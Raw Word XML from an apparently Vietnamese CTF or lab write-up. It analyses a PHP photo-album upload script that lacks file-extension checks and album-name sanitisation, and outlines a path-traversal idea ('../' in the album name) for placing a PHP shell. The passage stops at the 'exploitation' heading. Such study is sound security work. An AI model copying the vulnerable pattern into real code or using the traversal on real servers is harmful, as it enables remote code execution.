          <w:p w14:paraId="57513B8A" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t>23</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62660428" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:lastRenderedPageBreak/>
              <w:t>24</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EBA695D" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t>25</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50691822" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t>26</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ACFBA39" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t>27</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E280FCC" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t>28</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21F2DEF3" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t>29</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D5FE1F2" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t>30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="626C00AA" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t>31</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64626E6B" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t>32</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F32F7F5" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t>33</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="515F39DC" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t>34</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D3B8E2E" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t>35</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00CA4BB6" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t>36</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8707" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BC74627" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>&lt;?php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56DB397C" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve">    session_start();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33391E0B" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve"> (!isset($_SESSION[</w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'dir'</w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:t>])) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3142573A" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="59190DA2" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve">        $_SESSION[</w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'dir'</w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve">] = </w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'/var/www/html/upload/'</w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve"> . bin2hex(random_bytes(16));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="312CD738" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2049513E" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve">    $dir = $_SESSION[</w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'dir'</w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:t>];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37BE7F75" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="222C6D5E" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve"> ( !file_exists($dir) )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D6C7C07" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve">        mkdir($dir);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65DED9F4" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="315C556F" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:t>(isset($_FILES[</w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"files"</w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:t>]) &amp;&amp; $_POST[</w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'album'</w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:t>] !=</w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>""</w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve"> ) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E465D77" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>try</w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve"> {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C7C656A" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3B4B5C6A" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>//Create Album</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55251E3B" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve">            $album = $dir . </w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"/"</w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve"> . strtolower($_POST[</w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'album'</w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:t>]);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C05A177" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve"> ( !file_exists($album))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F101883" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve">                mkdir($album);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="378941F7" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="27B47B8C" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>//Count Files</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51F46307" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve">            $files = $_FILES[</w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'files'</w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:t>];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2787F416" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve">            $count = count($files[</w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"name"</w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:t>]);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25ABC317" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve">            </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49680DB1" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>// Save files to user's directory</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37E20BF4" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>for</w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve"> ($i = 0; $i &lt; $count; $i++) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75F16282" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve">                </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="485D1162" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve">                $newFile = $album . </w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"/"</w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve"> . $files[</w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"name"</w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:t>][$i];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3570B5B1" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3FF72004" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve">                move_uploaded_file($files[</w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"tmp_name"</w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:t>][$i], $newFile);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="069415B2" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve">            }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A10F1C7" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="77184E42" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve">       } </w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>catch</w:t>
            </w:r>
            <w:r w:rsidRPr="00362E10">
              <w:t>(Exception $e) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A7F3AA0" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve">            $error = $e-&gt;getMessage();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DF907AE" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve">         }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55A88C48" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E1A798D" w14:textId="77777777" w:rsidR="003A30C7" w:rsidRPr="00362E10" w:rsidRDefault="003A30C7" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00362E10">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2018CAB9" w14:textId="77777777" w:rsidR="00867EF9" w:rsidRPr="00867EF9" w:rsidRDefault="00867EF9" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00867EF9">
        <w:lastRenderedPageBreak/>
        <w:t>Chức năng chính</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7225DC8B" w14:textId="7E31F61A" w:rsidR="00867EF9" w:rsidRPr="00867EF9" w:rsidRDefault="00867EF9" w:rsidP="004F0B2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00867EF9">
        <w:t>Mỗi người dùng được gán một thư mục riêng bằng $_SESSION['dir'], nằm trong /var/www/html/upload/.</w:t>
      </w:r>
      <w:r w:rsidR="00E65D83">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E65D83" w:rsidRPr="00E65D83">
        <w:t>$dir có giá trị '/var/www/html/upload/' . bin2hex(random_bytes</w:t>
      </w:r>
      <w:r w:rsidR="00E65D83">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E65D83" w:rsidRPr="00E65D83">
        <w:t xml:space="preserve">(16)) </w:t>
      </w:r>
      <w:r w:rsidR="00E65D83">
        <w:t xml:space="preserve">nên </w:t>
      </w:r>
      <w:r w:rsidR="00E65D83" w:rsidRPr="00E65D83">
        <w:t>không thể kiểm soát được giá trị này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318AA952" w14:textId="77777777" w:rsidR="00867EF9" w:rsidRPr="00867EF9" w:rsidRDefault="00867EF9" w:rsidP="004F0B2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00867EF9">
        <w:t>Người dùng có thể tạo một album bằng cách nhập tên album qua $_POST['album'].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1462DFDD" w14:textId="67840E52" w:rsidR="00C43095" w:rsidRDefault="00867EF9" w:rsidP="004F0B2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00867EF9">
        <w:t>Các file được upload qua $_FILES['files'] và lưu vào thư mục tương ứng</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:r w:rsidRPr="00867EF9">
        <w:t>/var/www/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00867EF9">
        <w:t>html/upload/&lt;session_id&gt;/&lt;album&gt;/&lt;filename&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00B107DA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DEB973" w14:textId="77777777" w:rsidR="00E65D83" w:rsidRPr="00E65D83" w:rsidRDefault="00E65D83" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E65D83">
        <w:t>Vấn đề bảo mật</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737D4C7D" w14:textId="7C82CE49" w:rsidR="00E65D83" w:rsidRPr="00B107DA" w:rsidRDefault="00E65D83" w:rsidP="004F0B2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B107DA">
        <w:t>Không kiểm tra tên file hoặc phần mở rộng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6E93D5" w14:textId="38B379BF" w:rsidR="0035108B" w:rsidRDefault="00E65D83" w:rsidP="004F0B2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00B107DA">
        <w:t>Không chuẩn hóa tên album</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BF473B" w14:textId="77777777" w:rsidR="0035108B" w:rsidRDefault="0035108B" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF619D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">* Ý tưởng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2224B11E" w14:textId="06E98494" w:rsidR="00612794" w:rsidRPr="00612794" w:rsidRDefault="00612794" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00612794">
        <w:t xml:space="preserve">Upload file .php chứa mã độc vào </w:t>
      </w:r>
      <w:r w:rsidRPr="008D7694">
        <w:t xml:space="preserve">vị trí có thể thực thi </w:t>
      </w:r>
      <w:r w:rsidR="00C807AC" w:rsidRPr="008D7694">
        <w:t>được file php bằng cách</w:t>
      </w:r>
      <w:r w:rsidR="008D7694" w:rsidRPr="008D7694">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008D7694">
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="008D7694" w:rsidRPr="008D7694">
        <w:t>ợi dụng tên album chứa chuỗi ../ để lùi ra khỏi thư mục album mặc định và ghi file vào vị trí có thể thực thi được trên server — ví dụ: /var/www/html/upload/</w:t>
      </w:r>
      <w:r w:rsidR="008D7694">
        <w:t>&lt;session&gt;/&lt;album&gt;/../../</w:t>
      </w:r>
      <w:r w:rsidR="008D7694" w:rsidRPr="008D7694">
        <w:t>shell.</w:t>
      </w:r>
      <w:r w:rsidR="009D2888">
        <w:t>php.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6F5BF8" w14:textId="77777777" w:rsidR="0035108B" w:rsidRPr="00184ED1" w:rsidRDefault="0035108B" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184ED1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>* Khai thác</w:t>
      </w:r>
    </w:p>
